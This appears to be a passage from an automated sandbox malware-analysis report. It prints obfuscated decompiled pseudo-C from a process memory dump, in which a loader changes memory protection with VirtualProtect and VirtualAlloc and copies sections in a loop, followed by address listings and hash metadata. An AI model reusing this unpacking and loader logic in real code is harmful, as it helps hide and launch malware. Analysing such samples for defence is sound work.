                  					_t767 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t824, _v16, _t979);
                  					 *_t1143 = _t1081;
                  					 *(_t824 + 0x41cf40) = 0 ^ _t767;
                  					_t1097 = 0;
                  					_t981 =  *_t1143;
                  					_t1144 =  &(_t1143[1]);
                  					_pop( *_t408);
                  					 *_t1144 =  *_t1144 & 0x00000000;
                  					 *_t1144 =  *_t1144 + (0 ^ _v20);
                  					 *_t1144 = _t981;
                  					_t411 = _t824 + 0x41cc6e; // 0x41cc6e
                  					 *_t1144 = _t411;
                  					_t771 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v16, _t916);
                  					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) & 0x00000000;
                  					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) ^ _t981 & 0x00000000 ^ _t771;
                  					 *_t418 = _t981;
                  					_t986 = _v12;
                  					 *_t1144 = 2;
                  					_v12 = _v12 & 0x00000000;
                  					 *_t1144 =  *_t1144 ^ _t986;
                  					_t423 = _t824 + 0x41cfff; // 0x41cfff
                  					 *_t1144 =  *_t1144 & 0x00000000;
                  					 *_t1144 =  *_t1144 ^ _t423;
                  					_t773 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _v12, _t824);
                  					 *_t1144 =  *_t1144 & 0x00000000;
                  					 *_t1144 =  *_t1144 + _t773;
                  					_t425 = _t824 + 0x41c3b9; // 0x41c3b9
                  					 *_t1144 =  *_t1144 - _t1112;
                  					 *_t1144 =  *_t1144 | _t425;
                  					_t775 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _t986);
                  					_t1132 =  &(_t1144[1]);
                  					 *_t427 = _t775;
                  					_v20 = _v20 + (_t916 & 0x00000000 |  *_t1144);
                  					_push(_v20);
                  					_pop(_t776);
                  					_t1054 = _t1052;
                  					 *_t1132 = _t1054;
                  					_t879 =  *(_t824 + 0x41d0fa);
                  					_t1057 = 0;
                  					if(_t879 > _t776) {
                  						_t432 = _t824 + 0x41cfff; // 0x41cfff
                  						 *_t1132 =  *_t1132 - _t1112;
                  						 *_t1132 =  *_t1132 + _t432;
                  						_t433 = _t824 + 0x41c3b9; // 0x41c3b9
                  						 *_t1132 =  *_t1132 ^ _t1112;
                  						 *_t1132 =  *_t1132 + _t433;
                  						_t788 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1112, _t1112);
                  						_v12 = _t1097;
                  						 *((intOrPtr*)(_t824 + 0x41d019)) = _t788;
                  						_t1097 = _v12;
                  					}
                  					_pop( *_t438);
                  					_t987 = _v12;
                  					 *_t1132 =  *_t1132 ^ _t824;
                  					 *_t1132 = _t987;
                  					_t440 = _t824 + 0x41c42d; // 0x41c42d
                  					 *_t1132 =  *_t1132 - _t1097;
                  					 *_t1132 =  *_t1132 + _t440;
                  					_t778 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1097, _t824);
                  					 *_t1132 = _t1057;
                  					 *((intOrPtr*)(_t824 + 0x41c664)) = _t778;
                  					_t1060 = 0;
                  					_v16 = _v16 & 0x00000000;
                  					 *_t1132 =  *_t1132 + _t1060;
                  					_t446 = _t824 + 0x41c4b9; // 0x41c4b9
                  					_v12 = 0;
                  					 *_t1132 =  *_t1132 + _t446;
                  					_t449 = _t824 + 0x41c298; // 0x41c298
                  					 *_t1132 =  *_t1132 ^ _t1097;
                  					 *_t1132 = _t449;
                  					_t781 =  *((intOrPtr*)(_t824 + 0x41f068))();
                  					_v16 = _t987;
                  					 *(_t824 + 0x41c405) = 0 ^ _t781;
                  					_t947 = _v16;
                  					VirtualProtect(_t1097, _v12, _v16, ??);
                  					_t455 = _t824 + 0x41c772; // 0x41c772
                  					_v20 = 0;
                  					 *_t1132 =  *_t1132 ^ _t455;
                  					_t458 = _t824 + 0x41cb5c; // 0x41cb5c
                  					 *_t1132 =  *_t1132 ^ _t824;
                  					 *_t1132 =  *_t1132 | _t458;
                  					_t785 =  *((intOrPtr*)(_t824 + 0x41f068))(_t824, _v20);
                  					_v12 = _t1060;
                  					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) & 0x00000000;
                  					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) | _t1060 - _v12 ^ _t785;
                  					_t1023 = _v12;
                  				}
                  				_pop( *_t467);
                  				_v16 = 0;
                  				 *_t1132 =  *_t1132 + _t824 + 0x41d305;
                  				 *_t1132 =  *_t1132 ^ _t879;
                  				 *_t1132 =  *_t1132 | _t824 + 0x0041cf53;
                  				_t701 =  *((intOrPtr*)(_t824 + 0x41f068))(_t879, _v16);
                  				_v16 = _t947;
                  				 *(_t824 + 0x41c775) = 0 ^ _t701;
                  				_t950 = _v16;
                  				_t1026 = (_t1023 & 0x00000000 | _v12) + 0xf8;
                  				_t827 = _t824;
                  				_v20 = 0;
                  				 *_t1132 =  *_t1132 ^ _t827 + 0x0041d2fb;
                  				_v16 = _v16 & 0x00000000;
                  				 *_t1132 =  *_t1132 + _t827 + 0x41c2ea;
                  				_push( *((intOrPtr*)(_t827 + 0x41f068))(_v16, _v20));
                  				_pop( *_t485);
                  				_push(_v12);
                  				_pop( *_t487);
                  				do {
                  					 *_t1132 = _t1026;
                  					 *_t1132 =  *_t1132 ^ _t879;
                  					 *_t1132 =  *_t1132 ^ _t827 + 0x0041c966;
                  					_t706 =  *((intOrPtr*)(_t827 + 0x41f060))(_t879, _v16);
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1132 =  *_t1132 | _t706;
                  					 *_t1132 = _t827 + 0x41ca40;
                  					_t708 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, _v20);
                  					_t1133 = _t1132 - 0xfffffffc;
                  					 *_t497 = _t708;
                  					_v12 = _v12 + (_t879 & 0x00000000) +  *_t1132;
                  					_push(_v12);
                  					_pop(_t709);
                  					_t1028 = _t1026;
                  					_v16 = _t950;
                  					_t882 = 0 ^  *(_t827 + 0x41d332);
                  					_t953 = _v16;
                  					if(_t882 > _t709) {
                  						 *_t1133 =  *_t1133 ^ _t1112;
                  						 *_t1133 = _t827 + 0x41c966;
                  						 *_t1133 =  *_t1133 & 0x00000000;
                  						 *_t1133 =  *_t1133 | _t827 + 0x0041ca40;
                  						_t709 =  *((intOrPtr*)(_t827 + 0x41f064))(_t882, _t1112);
                  					}
                  					 *_t1133 = _t882;
                  					 *((intOrPtr*)(_t827 + 0x41c6bc)) = _t709;
                  					_v20 = _t1028;
                  					_t1031 = _v20;
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1133 =  *_t1133 + _t827 + 0x41c5f7;
                  					_t711 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, 0);
                  					 *_t1133 = _t711;
                  					_v16 = _v16 & 0x00000000;
                  					 *_t1133 =  *_t1133 | _t827 + 0x0041c637;
                  					_t713 =  *((intOrPtr*)(_t827 + 0x41f060))(_v16, _v12);
                  					_t1134 =  &(_t1133[1]);
                  					_v20 = _a4;
                  					_push( *_t1133 + _t713);
                  					_t1085 = _v20;
                  					_pop(_t714);
                  					_push( *((intOrPtr*)(_t827 + 0x41cece)));
                  					_pop( *_t525);
                  					_push(_v20);
                  					_pop(_t888);
                  					if(_t888 > _t714) {
                  						 *_t1134 =  *_t1134 - _t888;
                  						 *_t1134 =  *_t1134 ^ _t827 + 0x0041c5f7;
                  						_v20 = _v20 & 0x00000000;
                  						 *_t1134 =  *_t1134 | _t827 + 0x0041c637;
                  						_t714 =  *((intOrPtr*)(_t827 + 0x41f064))(_v20, _t888);
                  					}
                  					_v12 = _t1085;
                  					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) & 0x00000000;
                  					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) | _t1085 ^ _v12 | _t714;
                  					 *_t1134 = _t1112;
                  					_t889 = 0 ^  *(_t1031 + 0x10);
                  					_t1112 = 0;
                  					 *_t1134 =  *_t1134 & 0x00000000;
                  					 *_t1134 =  *_t1134 ^ _t889;
                  					_v20 = 0;
                  					 *_t1134 =  *_t1134 ^ _t827 + 0x0041cee6;
                  					 *_t1134 =  *_t1134 ^ _t1112;
                  					 *_t1134 =  *_t1134 + _t827 + 0x41c9b9;
                  					_t717 =  *((intOrPtr*)(_t827 + 0x41f068))(_v20, _t714);
                  					_v20 = _t1031;
                  					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) & 0x00000000;
                  					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) ^ (_t1031 & 0x00000000 | _t717);
                  					_t1034 = _v20;
                  					 *_t552 = _t1112;
                  					_push(_v12);
                  					_pop( *_t555);
                  					_v16 = _v16 +  *((intOrPtr*)(_t1034 + 0x14));
                  					_push(_v16);
                  					_pop(_t1089);
                  					_t955 = _t953;
                  					_v16 = 0;
                  					 *_t1134 =  *_t1134 ^ _t889 & 0x00000000 ^ _v20;
                  					 *_t1134 =  *_t1134 & 0x00000000;
                  					 *_t1134 =  *_t1134 + _t827 + 0x41c452;
                  					_v12 = 0;
                  					 *_t1134 =  *_t1134 ^ _t827 + 0x0041c156;
                  					_t720 =  *((intOrPtr*)(_t827 + 0x41f068))(_v12, _t955, _v16);
                  					 *_t1134 = _t955;
                  					 *((intOrPtr*)(_t827 + 0x41c66c)) = _t720;
                  					_t958 = 0;
                  					_pop( *_t567);
                  					_t893 = _v16;
                  					_t1035 =  *(_t1034 + 0xc);
                  					 *_t1134 =  *_t1134 & 0x00000000;
                  					 *_t1134 =  *_t1134 + _t893;
                  					 *_t1134 =  *_t1134 - _t1112;
                  					 *_t1134 = _t827 + 0x41c5a4;
                  					_t722 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112, _t1089);
                  					 *_t1134 =  *_t1134 - _t1112;
                  					 *_t1134 =  *_t1134 ^ _t722;
                  					 *_t1134 =  *_t1134 ^ _t1035;
                  					 *_t1134 =  *_t1134 + _t827 + 0x41ce5b;
                  					_t724 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112);
                  					 *_t574 = _t1035;
                  					 *_t1134 =  *_t1134 + _t827;
                  					_t828 = _t724;
                  					_t827 = 0;
                  					_push( *((intOrPtr*)(_t827 + 0x41d348)));
                  					_pop( *_t577);
                  					_push(_v12);
                  					_pop(_t896);
                  					if(_t896 > _t828 + (_t893 & 0x00000000 ^ _v20)) {
                  						_t579 = _t827 + 0x41c5a4; // 0x41c5a4
                  						 *_t1134 =  *_t1134 ^ _t958;
                  						 *_t1134 =  *_t1134 | _t579;
                  						_t580 = _t827 + 0x41ce5b; // 0x41ce5b
                  						 *_t1134 =  *_t1134 - _t896;
                  						 *_t1134 =  *_t1134 | _t580;
                  						_t733 =  *((intOrPtr*)(_t827 + 0x41f064))(_t896, _t958);
                  						_v20 = _t1089;
                  						 *(_t827 + 0x41c50f) = 0 ^ _t733;
                  						_t1089 = _v20;
                  					}
                  					_v12 = _t958;
                  					_t1036 =  *(_t827 + 0x41c166) + _t1035;
                  					_t726 = memcpy(_t1036, _t1089, (_t896 & 0x00000000) +  *_t1134);
                  					_t1136 =  &(_t1134[4]);
                  					_t879 = 0;
                  					_t1132 = _t1136 - 0xfffffffc;
                  					_push(_v12);
                  					_t1026 =  *_t1136 + 0x28;
                  					_pop(_t950);
                  					_t588 =  &_v8;
                  					 *_t588 = _v8 - 1;
                  				} while ( *_t588 != 0);
                  				_pop( *_t590);
                  				_t1041 = _v16;
                  				_push(_t1112);
                  				 *_t594 = _t726 & 0x00000000 ^ _t1112 -  *_t1132 ^  *(_t1041 + 0x28);
                  				_v20 = _v20 +  *(_t827 + 0x41c166);
                  				_push(_v20);
                  				_pop(_t729);
                  				_t1043 = _t1041;
                  				 *_t1132 = _t950;
                  				 *((intOrPtr*)(_t827 + 0x41d140)) = _t729;
                  				_t966 = 0;
                  				_v12 = 0;
                  				_t1091 = _t1089 & 0x00000000 | 0 ^  *(_t827 + 0x41c166);
                  				_t901 = _v12;
                  				if(_t1091 > 0) {
                  					 *_t1132 =  *_t1132 & 0x00000000;
                  					 *_t1132 =  *_t1132 + _t1091;
                  					_t730 = E046B4E1A(_t827, _t901, _t966, _t1043, _t1091, _t827);
                  					 *_t1132 = _t1091;
                  					_t729 = E046B2FAF(_t730, _t827, _t901, _t966, _t1043, _t1091, _v12);
                  				}
                  				_pop( *_t603);
                  				return _t729;
                  			}


































































































































































































                  0x046b5f16
                  0x046b5f16
                  0x046b5f16
                  0x046b5f17
                  0x046b5f1b
                  0x046b5f1e
                  0x046b5f20
                  0x046b5f23
                  0x046b5f24
                  0x046b5f28
                  0x046b5f2b
                  0x046b5f2c
                  0x046b5f30
                  0x046b5f39
                  0x046b5f3a
                  0x046b5f3d
                  0x046b5f46
                  0x046b5f4a
                  0x046b5f4d
                  0x046b5f56
                  0x046b5f57
                  0x046b5f5a
                  0x046b5f5d
                  0x046b5f63
                  0x046b5f66
                  0x046b5f6e
                  0x046b5f71
                  0x046b5f72
                  0x046b5f75
                  0x046b5f78
                  0x046b5f7b
                  0x046b5f84
                  0x046b5f85
                  0x046b5f88
                  0x046b5f8b
                  0x046b5f91
                  0x046b5f94
                  0x046b5f9d
                  0x046b5f9e
                  0x046b5fa2
                  0x046b5fa5
                  0x046b5fab
                  0x046b5fb1
                  0x046b5fb5
                  0x046b5fb8
                  0x046b5fbb
                  0x046b5fbe
                  0x046b5fc0
                  0x046b5fcb
                  0x046b5fd2
                  0x046b5fda
                  0x046b5fdd
                  0x046b5fe6
                  0x046b5fe7
                  0x046b5fea
                  0x046b5ff3
                  0x046b5ff4
                  0x046b5ff7
                  0x046b5ffa
                  0x046b5ffa
                  0x046b6002
                  0x046b6005
                  0x046b6009
                  0x046b600d
                  0x046b6017
                  0x046b601b
                  0x046b6025
                  0x046b6029
                  0x046b602c
                  0x046b6032
                  0x046b6039
                  0x046b604b
                  0x046b6054
                  0x046b605e
                  0x046b6067
                  0x046b6068
                  0x046b606b
                  0x046b606e
                  0x046b6074
                  0x046b607b
                  0x046b607e
                  0x046b6088
                  0x046b608b
                  0x046b6094
                  0x046b6095
                  0x046b6098
                  0x046b609b
                  0x046b60a1
                  0x046b60a7
                  0x046b60ae
                  0x046b60b7
                  0x046b60be
                  0x046b60c1
                  0x046b60c8
                  0x046b60cb
                  0x046b60d4
                  0x046b60db
                  0x046b60de
                  0x046b60e4
                  0x046b60e7
                  0x046b60ee
                  0x046b60f1
                  0x046b60f4
                  0x046b60f7
                  0x046b60f8
                  0x046b6106
                  0x046b6108
                  0x046b610b
                  0x046b6114
                  0x046b6118
                  0x046b6124
                  0x046b6127
                  0x046b612d
                  0x046b6133
                  0x046b613a
                  0x046b6140
                  0x046b6147
                  0x046b614a
                  0x046b614f
                  0x046b6156
                  0x046b615c
                  0x046b615f
                  0x046b6162
                  0x046b616b
                  0x046b616e
                  0x046b6172
                  0x046b6176
                  0x046b617a
                  0x046b617e
                  0x046b6188
                  0x046b618c
                  0x046b6195
                  0x046b619c
                  0x046b619f
                  0x046b61ab
                  0x046b61b2
                  0x046b61be
                  0x046b61c1
                  0x046b61c8
                  0x046b61d1
                  0x046b61db
                  0x046b61de
                  0x046b61e5
                  0x046b61e8
                  0x046b61f1
                  0x046b61fb
                  0x046b61fe
                  0x046b6206
                  0x046b6209
                  0x046b6210
                  0x046b6213
                  0x046b6216
                  0x046b6219
                  0x046b621a
                  0x046b621b
                  0x046b6231
                  0x046b6239
                  0x046b6240
                  0x046b6249
                  0x046b6253
                  0x046b6256
                  0x046b6256
                  0x046b625e
                  0x046b6265
                  0x046b626b
                  0x046b626c
                  0x046b6276
                  0x046b6279
                  0x046b6283
                  0x046b628c
                  0x046b6296
                  0x046b6299
                  0x046b629f
                  0x046b62a9
                  0x046b62b5
                  0x046b62b8
                  0x046b62c3
                  0x046b62c6
                  0x046b62cd
                  0x046b62ce
                  0x046b62d1
                  0x046b62d2
                  0x046b62dd
                  0x046b62df
                  0x046b62e4
                  0x046b62ec
                  0x046b62f6
                  0x046b6300
                  0x046b6303
                  0x046b6306
                  0x046b630c
                  0x046b6314
                  0x046b631b
                  0x046b6321
                  0x046b6321
                  0x046b632a
                  0x046b632d
                  0x046b6335
                  0x046b6338
                  0x046b633b
                  0x046b633e
                  0x046b633f
                  0x046b6343
                  0x046b634d
                  0x046b6351
                  0x046b635d
                  0x046b6360
                  0x046b6368
                  0x046b636f
                  0x046b6375
                  0x046b637c
                  0x046b637f
                  0x046b6385
                  0x046b6389
                  0x046b638c
                  0x046b6396
                  0x046b6399
                  0x046b63a2
                  0x046b63a9
                  0x046b63ac
                  0x046b63b4
                  0x046b63bb
                  0x046b63c1
                  0x046b63c7
                  0x046b63ca
                  0x046b63d1
                  0x046b63d3
                  0x046b63dc
                  0x046b63e6
                  0x046b63e9
                  0x046b63f0
                  0x046b63f3
                  0x046b63fd
                  0x046b6400
                  0x046b6403
                  0x046b6412
                  0x046b6417
                  0x046b641b
                  0x046b641e
                  0x046b6420
                  0x046b6421
                  0x046b642c
                  0x046b642e
                  0x046b6433
                  0x046b643c
                  0x046b643f
                  0x046b6448
                  0x046b6452
                  0x046b6455
                  0x046b6455
                  0x046b6461
                  0x046b6468
                  0x046b646e
                  0x046b6474
                  0x046b6477
                  0x046b6483
                  0x046b6486
                  0x046b648c
                  0x046b6494
                  0x046b649b
                  0x046b64a1
                  0x046b64a6
                  0x046b64b2
                  0x046b64b6
                  0x046b64b9
                  0x046b64c1
                  0x046b64c5
                  0x046b64c8
                  0x046b64d4
                  0x046b64db
                  0x046b64e1
                  0x046b64e3
                  0x046b64e6
                  0x046b64f2
                  0x046b64f5
                  0x046b64fe
                  0x046b650a
                  0x046b650d
                  0x046b6515
                  0x046b6518
                  0x046b651f
                  0x046b6522
                  0x046b6525
                  0x046b6528
                  0x046b6529
                  0x046b6537
                  0x046b6539
                  0x046b653c
                  0x046b653e
                  0x046b6544
                  0x046b654e
                  0x046b6551
                  0x046b6558
                  0x046b655c
                  0x046b655f
                  0x046b655f
                  0x046b6567
                  0x046b656e
                  0x046b6574
                  0x046b6575
                  0x046b6586
                  0x046b6590
                  0x046b6593
                  0x046b659a
                  0x046b659e
                  0x046b65a1
                  0x046b65a9
                  0x046b65b0
                  0x046b65b6
                  0x046b65b7
                  0x046b65ca
                  0x046b65cc
                  0x046b65ce
                  0x046b65d2
                  0x046b65d5
                  0x046b65db
                  0x046b65e5
                  0x046b65e8
                  0x046b65ee
                  0x046b65f6
                  0x046b65fd
                  0x046b6603
                  0x046b660b
                  0x046b6610
                  0x046b6618
                  0x046b661b
                  0x046b6622
                  0x046b6625
                  0x046b662b
                  0x046b6632
                  0x046b6635
                  0x046b663c
                  0x046b6640
                  0x046b6643
                  0x046b664a
                  0x046b664e
                  0x046b6651
                  0x046b6659
                  0x046b665f
                  0x046b6666
                  0x046b6667
                  0x046b666a
                  0x046b666b
                  0x046b6671
                  0x046b6674
                  0x046b6677
                  0x046b667a
                  0x046b6685
                  0x046b668f
                  0x046b6693
                  0x046b6696
                  0x046b669d
                  0x046b66a0
                  0x046b66a3
                  0x046b66a3
                  0x046b66a9
                  0x046b66ac
                  0x046b66af
                  0x046b66c2
                  0x046b66c6
                  0x046b66c9
                  0x046b66d2
                  0x046b66dc
                  0x046b66e8
                  0x046b66eb
                  0x046b66f1
                  0x046b66f8
                  0x046b66fe
                  0x046b6703
                  0x046b6706
                  0x046b670b
                  0x046b670e
                  0x046b6713
                  0x046b671a
                  0x046b671d
                  0x046b6720
                  0x046b6727
                  0x046b6730
                  0x046b673a
                  0x046b673d
                  0x046b6743
                  0x046b674d
                  0x046b6757
                  0x046b675b
                  0x046b675e
                  0x046b676d
                  0x046b6774
                  0x046b6777
                  0x046b677a
                  0x046b677d
                  0x046b677e
                  0x046b677f
                  0x046b6781
                  0x046b678c
                  0x046b6791
                  0x046b679a
                  0x046b679d
                  0x046b67a7
                  0x046b67ab
                  0x046b67ae
                  0x046b67b4
                  0x046b67b6
                  0x046b67bd
                  0x046b67c3
                  0x046b67c4
                  0x046b67c7
                  0x046b67cc
                  0x046b67cf
                  0x046b67d2
                  0x046b67d2
                  0x046b67d3
                  0x046b67dd
                  0x046b67e0
                  0x046b67e7
                  0x046b67f1
                  0x046b67f4
                  0x046b67f7
                  0x046b67fe
                  0x046b6801
                  0x046b680b
                  0x046b680f
                  0x046b6812
                  0x046b681d
                  0x046b6824
                  0x046b6827
                  0x046b682a
                  0x046b682d
                  0x046b682e
                  0x046b682f
                  0x046b6841
                  0x046b684c
                  0x046b6858
                  0x046b685b
                  0x046b6861
                  0x046b6868
                  0x046b686e
                  0x046b6873
                  0x046b6876
                  0x046b687e
                  0x046b6881
                  0x046b6881
                  0x046b6889
                  0x046b688d
                  0x046b6897
                  0x046b689b
                  0x046b68a4
                  0x046b68ae
                  0x046b68b1
                  0x046b68bd
                  0x046b68c4
                  0x046b68cd
                  0x046b68d0
                  0x046b68d3
                  0x046b68e0
                  0x046b68e4
                  0x046b68e7
                  0x046b68f0
                  0x046b68f7
                  0x046b6900
                  0x046b6901
                  0x046b6904
                  0x046b6907
                  0x046b6913
                  0x046b6916
                  0x046b6919
                  0x046b6926
                  0x046b692f
                  0x046b6939
                  0x046b693c
                  0x046b6945
                  0x046b6951
                  0x046b6954
                  0x046b6960
                  0x046b6968
                  0x046b696c
                  0x046b6971
                  0x046b6972
                  0x046b697d
                  0x046b697f
                  0x046b6984
                  0x046b6986
                  0x046b698d
                  0x046b6990
                  0x046b6993
                  0x046b699a
                  0x046b699d
                  0x046b69a0
                  0x046b69a6
                  0x046b69ae
                  0x046b69b5
                  0x046b69bb
                  0x046b69c0
                  0x046b69c3
                  0x046b69c6
                  0x046b69cd
                  0x046b69d0
                  0x046b69d6
                  0x046b69d9
                  0x046b69e0
                  0x046b69e4
                  0x046b69e7
                  0x046b69f0
                  0x046b69f3
                  0x046b69fb
                  0x046b6a02
                  0x046b6a08
                  0x046b6a0b
                  0x046b6a0e
                  0x046b6a13
                  0x046b6a1a
                  0x046b6a1e
                  0x046b6a24
                  0x046b6a27
                  0x046b6a30
                  0x046b6a33
                  0x046b6a3f
                  0x046b6a46
                  0x046b6a4f
                  0x046b6a52
                  0x046b6a56
                  0x046b6a5d
                  0x046b6a64
                  0x046b6a67
                  0x046b6a6e
                  0x046b6a72
                  0x046b6a75
                  0x046b6a7c
                  0x046b6a80
                  0x046b6a83
                  0x046b6a8a
                  0x046b6a8d
                  0x046b6a90
                  0x046b6a9f
                  0x046b6aa6
                  0x046b6aa9
                  0x046b6aac
                  0x046b6aaf
                  0x046b6ab0
                  0x046b6ab3
                  0x046b6abe
                  0x046b6ac0
                  0x046b6ac3
                  0x046b6ac5
                  0x046b6acc
                  0x046b6acf
                  0x046b6ad2
                  0x046b6ad9
                  0x046b6adc
                  0x046b6adf
                  0x046b6ae5
                  0x046b6aec
                  0x046b6af2
                  0x046b6af2
                  0x046b6af5
                  0x046b6af8
                  0x046b6afc
                  0x046b6aff
                  0x046b6b02
                  0x046b6b09
                  0x046b6b0c
                  0x046b6b0f
                  0x046b6b17
                  0x046b6b1e
                  0x046b6b24
                  0x046b6b25
                  0x046b6b2c
                  0x046b6b2f
                  0x046b6b35
                  0x046b6b3f
                  0x046b6b42
                  0x046b6b49
                  0x046b6b4c
                  0x046b6b4f
                  0x046b6b55
                  0x046b6b5c
                  0x046b6b62
                  0x046b6b65
                  0x046b6b6b
                  0x046b6b71
                  0x046b6b7b
                  0x046b6b7e
                  0x046b6b85
                  0x046b6b88
                  0x046b6b8b
                  0x046b6b91
                  0x046b6b99
                  0x046b6ba0
                  0x046b6ba6
                  0x046b6ba6
                  0x046b6baf
                  0x046b6bbb
                  0x046b6bc5
                  0x046b6bcf
                  0x046b6bd2
                  0x046b6bd5
                  0x046b6bdb
                  0x046b6be2
                  0x046b6be8
                  0x046b6bf4
                  0x046b6bf6
                  0x046b6bfd
                  0x046b6c07
                  0x046b6c10
                  0x046b6c17
                  0x046b6c20
                  0x046b6c21
                  0x046b6c24
                  0x046b6c27
                  0x046b6c2d
                  0x046b6c30
                  0x046b6c3a
                  0x046b6c3d
                  0x046b6c40
                  0x046b6c46
                  0x046b6c4d
                  0x046b6c59
                  0x046b6c5c
                  0x046b6c6b
                  0x046b6c72
                  0x046b6c75
                  0x046b6c78
                  0x046b6c7b
                  0x046b6c7c
                  0x046b6c7d
                  0x046b6c88
                  0x046b6c8a
                  0x046b6c8f
                  0x046b6c98
                  0x046b6c9b
                  0x046b6ca5
                  0x046b6ca9
                  0x046b6cac
                  0x046b6cac
                  0x046b6cb4
                  0x046b6cbb
                  0x046b6cc2
                  0x046b6ccc
                  0x046b6cd5
                  0x046b6cdc
                  0x046b6cdf
                  0x046b6ce8
                  0x046b6cf1
                  0x046b6cf8
                  0x046b6cfb
                  0x046b6d06
                  0x046b6d09
                  0x046b6d10
                  0x046b6d11
                  0x046b6d14
                  0x046b6d15
                  0x046b6d1b
                  0x046b6d1e
                  0x046b6d21
                  0x046b6d24
                  0x046b6d2d
                  0x046b6d30
                  0x046b6d39
                  0x046b6d40
                  0x046b6d43
                  0x046b6d43
                  0x046b6d49
                  0x046b6d51
                  0x046b6d58
                  0x046b6d63
                  0x046b6d6b
                  0x046b6d6d
                  0x046b6d6f
                  0x046b6d73
                  0x046b6d7c
                  0x046b6d86
                  0x046b6d90
                  0x046b6d93
                  0x046b6d96
                  0x046b6d9c
                  0x046b6da4
                  0x046b6dab
                  0x046b6db1
                  0x046b6dba
                  0x046b6dc4
                  0x046b6dc5
                  0x046b6dc8
                  0x046b6dcb
                  0x046b6dce
                  0x046b6dcf
                  0x046b6dd0
                  0x046b6dda
                  0x046b6de4
                  0x046b6de8
                  0x046b6df1
                  0x046b6dfb
                  0x046b6dfe
                  0x046b6e06
                  0x046b6e0d
                  0x046b6e13
                  0x046b6e16
                  0x046b6e19
                  0x046b6e1c
                  0x046b6e20
                  0x046b6e24
                  0x046b6e2e
                  0x046b6e31
                  0x046b6e34
                  0x046b6e3b
                  0x046b6e3e
                  0x046b6e48
                  0x046b6e4b
                  0x046b6e4e
                  0x046b6e5a
                  0x046b6e62
                  0x046b6e66
                  0x046b6e6b
                  0x046b6e6c
                  0x046b6e72
                  0x046b6e75
                  0x046b6e78
                  0x046b6e7b
                  0x046b6e7d
                  0x046b6e84
                  0x046b6e87
                  0x046b6e8a
                  0x046b6e91
                  0x046b6e94
                  0x046b6e97
                  0x046b6e9d
                  0x046b6ea4
                  0x046b6eaa
                  0x046b6eaa
                  0x046b6eb9
                  0x046b6ec8
                  0x046b6ec9
                  0x046b6ec9
                  0x046b6ec9
                  0x046b6ed4
                  0x046b6ed7
                  0x046b6ee0
                  0x046b6ee2
                  0x046b6ee3
                  0x046b6ee3
                  0x046b6ee3
                  0x046b6eec
                  0x046b6eef
                  0x046b6ef2
                  0x046b6f07
                  0x046b6f0a
                  0x046b6f0d
                  0x046b6f10
                  0x046b6f11
                  0x046b6f14
                  0x046b6f1b
                  0x046b6f21
                  0x046b6f22
                  0x046b6f31
                  0x046b6f33
                  0x046b6f39
                  0x046b6f3c
                  0x046b6f40
                  0x046b6f43
                  0x046b6f4b
                  0x046b6f4e
                  0x046b6f4e
                  0x046b6f61
                  0x046b6f68

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.299586396.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
                  • Instruction ID: 356fc89d39a60ee20eac068b79206b750a9f62a3078ec7723f71ea8e5cfff5f8
                  • Opcode Fuzzy Hash: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
                  • Instruction Fuzzy Hash: D4C22572844608EFEB049FA0C8C57EEBBF5FF48320F0589ADD899AA145D7345264CF59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E046B709D(signed int __ebx, long __ecx, void* __edx, void* __edi, long __esi, void* __eflags) {
                  				void* _t47;
                  				signed int _t48;
                  				signed int _t49;
                  				void* _t51;
                  				void* _t52;
                  				void* _t54;
                  				void* _t55;
                  				signed int _t59;
                  				long _t60;
                  				void* _t62;
                  				void* _t65;
                  				void* _t67;
                  				signed int _t68;
                  				void* _t72;
                  				signed int _t75;
                  				signed int _t78;
                  				void* _t81;
                  				signed int _t82;
                  				long _t87;
                  				signed int _t89;
                  				long _t94;
                  				void* _t97;
                  				void* _t99;
                  				long _t101;
                  				void* _t102;
                  
                  				_t87 = __esi;
                  				_t79 = __edi;
                  				_t72 = __edx;
                  				_t59 = __ebx;
                  				 *_t101 = 0xffff0000;
                  				_t48 = E046B2D42(_t47, __ebx, __ecx, __edx, __edi, __esi, __edi);
                  				 *_t101 =  *_t101 | _t59;
                  				_t60 = _t59;
                  				if( *_t101 != 0) {
                  					 *_t101 =  *_t101 + 4;
                  					 *_t101 =  *_t101 - _t94;
                  					 *_t101 =  *_t101 + 0x1000;
                  					 *_t101 =  *_t101 - _t60;
                  					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c22f));
                  					_t48 = VirtualAlloc(0, __ecx, _t60, _t94);
                  				}
                  				 *(_t94 - 8) = 0;
                  				_push( *(_t94 - 8));
                  				 *_t101 =  *_t101 ^ _t48;
                  				_pop( *_t6);
                  				 *(_t60 + 0x41c60a) = 2;
                  				 *_t101 = _t94;
                  				 *(_t60 + 0x41d10e) = _t48;
                  				_t97 = 0;
                  				if( *(_t60 + 0x41c166) > 0) {
                  					_t55 = _t60 + 0x41c60a;
                  					 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
                  					 *_t101 = _t55 +  *_t101;
                  					 *_t101 = 0x40;
